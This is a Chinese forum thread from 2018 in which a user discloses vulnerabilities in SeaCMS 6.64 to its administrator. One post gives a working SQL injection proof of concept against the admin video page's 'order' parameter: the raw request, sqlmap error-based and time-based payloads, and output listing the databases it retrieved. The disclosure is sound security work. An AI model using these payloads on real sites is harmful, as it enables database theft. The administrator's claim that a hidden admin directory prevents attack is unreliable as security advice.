海洋CMS

 找回密码
 注册加入

欢迎加入QQ交流群 加入QQ交流群,和志同道合的小伙伴一起进步 ①757212625

海洋CMS 6.x 正式版下载 永久免费并开源的影视建站程序 使用教程 - 模板标签 - 模板 - 播放器

火车头采集发布视频文章 - - 定时自动采集教程 迅雷下载展示插件及教程 - - 定时自动生成使用说明 原MaxCms模板转换教程 - - 原MaxCms数据转换工具

查看: 312|回复: 9

发现一处反射型xss

[复制链接]

3

主题

9

帖子

137

积分

注册会员

Rank: 2

金币
70
发表于 2018-9-6 15:30:56 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?注册加入

x
发现一处反射型xss,这个考虑修复么?

159

主题

1941

帖子

968万

积分

管理员

Rank: 9Rank: 9Rank: 9

金币
9670601
发表于 2018-9-6 16:39:11 | 显示全部楼层
请提供漏洞细节,以便修复问题。
回复

使用道具 举报

3

主题

9

帖子

137

积分

注册会员

Rank: 2

金币
70
 楼主| 发表于 2018-9-6 16:56:47 | 显示全部楼层
发现一处目录浏览 一处任意文件删除 一处sql注入 三处反射xss,要在论坛公布细节么?还是私聊
回复

使用道具 举报

159

主题

1941

帖子

968万

积分

管理员

Rank: 9Rank: 9Rank: 9

金币
9670601
发表于 2018-9-6 17:48:09 | 显示全部楼层
bug123 发表于 2018-9-6 16:56
发现一处目录浏览 一处任意文件删除 一处sql注入 三处反射xss,要在论坛公布细节么?还是私聊 ...

可以直接在论坛公开,会及时更新补丁。另外管理后台的多个漏洞已知,如果是后台的漏洞,则暂时不会进行修复。
回复

使用道具 举报

3

主题

9

帖子

137

积分

注册会员

Rank: 2

金币
70
 楼主| 发表于 2018-9-9 22:47:14 | 显示全部楼层
order参数存在sql注入

GET /seacms6.64/upload/admin/admin_video.php?repeat=ok&order=v_name&allrepeat=ok' HTTP/1.1
Host: 172.16.173.249
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://172.16.173.203/seacms6.64 ... e.php?action=repeat
Cookie: PHPSESSID=odsoljsk6cvfkvcgm0i03v8np6
Connection: close
Upgrade-Insecure-Requests: 1


将ip,cookie更改,使用sqlmap测试即可



sqlmap扫描结果:
  1. Parameter: order (GET)
  2.     Type: error-based
  3.     Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
  4.     Payload: repeat=ok&order=v_name AND EXTRACTVALUE(9668,CONCAT(0x5c,0x7171767071,(SELECT (ELT(9668=9668,1))),0x716a717a71))&allrepeat=ok'

  5.     Type: AND/OR time-based blind
  6.     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  7.     Payload: repeat=ok&order=v_name AND (SELECT * FROM (SELECT(SLEEP(5)))XHME)&allrepeat=ok'
  8. ---
  9. [22:40:36] [INFO] the back-end DBMS is MySQL
  10. web server operating system: Linux Ubuntu
  11. web application technology: Apache 2.4.29
  12. back-end DBMS: MySQL >= 5.1
复制代码




注入出数据库:

  1. information_schema
  2. [22:43:58] [INFO] retrieved: OTCMS
  3. [22:44:15] [INFO] retrieved: mysql
  4. [22:44:32] [INFO] retrieved: performance_schema
  5. [22:45:29] [INFO] retrieved: seacms
  6. [22:45:45] [INFO] retrieved: sys
  7. available databases [6]:
  8. [*] information_schema
  9. [*] mysql
  10. [*] OTCMS
  11. [*] performance_schema
  12. [*] seacms
  13. [*] sys

  14. [22:45:56] [INFO] fetched data logged to text files under '/Users/xiaohuihui/.sqlmap/output/172.16.173.249'
复制代码
回复

使用道具 举报

3

主题

9

帖子

137

积分

注册会员

Rank: 2

金币
70
 楼主| 发表于 2018-9-9 22:49:53 | 显示全部楼层
回复

使用道具 举报

3

主题

9

帖子

137

积分

注册会员

Rank: 2

金币
70
 楼主| 发表于 2018-9-10 08:09:33 | 显示全部楼层
bug123 发表于 2018-9-9 22:47
order参数存在sql注入

GET /seacms6.64/upload/admin/admin_video.php?repeat=ok&order=v_name&allrepeat= ...

涉及的seacms版本:6.64
回复

使用道具 举报

10

主题

63

帖子

5902

积分

论坛元老

Rank: 8Rank: 8

金币
2855
发表于 2018-9-14 10:06:20 | 显示全部楼层
看了BUG哥写的,再看下自己的站,心一个惊呀。。。。
回复

使用道具 举报

159

主题

1941

帖子

968万

积分

管理员

Rank: 9Rank: 9Rank: 9

金币
9670601
发表于 2018-9-14 12:48:09 | 显示全部楼层
所有admin安全目录问题暂不处理。
回复

使用道具 举报

159

主题

1941

帖子

968万

积分

管理员

Rank: 9Rank: 9Rank: 9

金币
9670601
发表于 2018-9-14 12:49:03 | 显示全部楼层
kkanlin 发表于 2018-9-14 10:06
看了BUG哥写的,再看下自己的站,心一个惊呀。。。。

所有admin安全目录问题暂不处理。
没啥可心惊的,海洋cms强制要求修改后台目录,只要你后台目录的名字不暴露,就不会被攻击。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册加入

本版积分规则

小黑屋|海洋CMS

GMT+8, 2018-11-19 05:46 , Processed in 0.055348 second(s), 23 queries .

Powered by SeaCMS .Net

© 2018 All Rights Reserved

快速回复 返回顶部 返回列表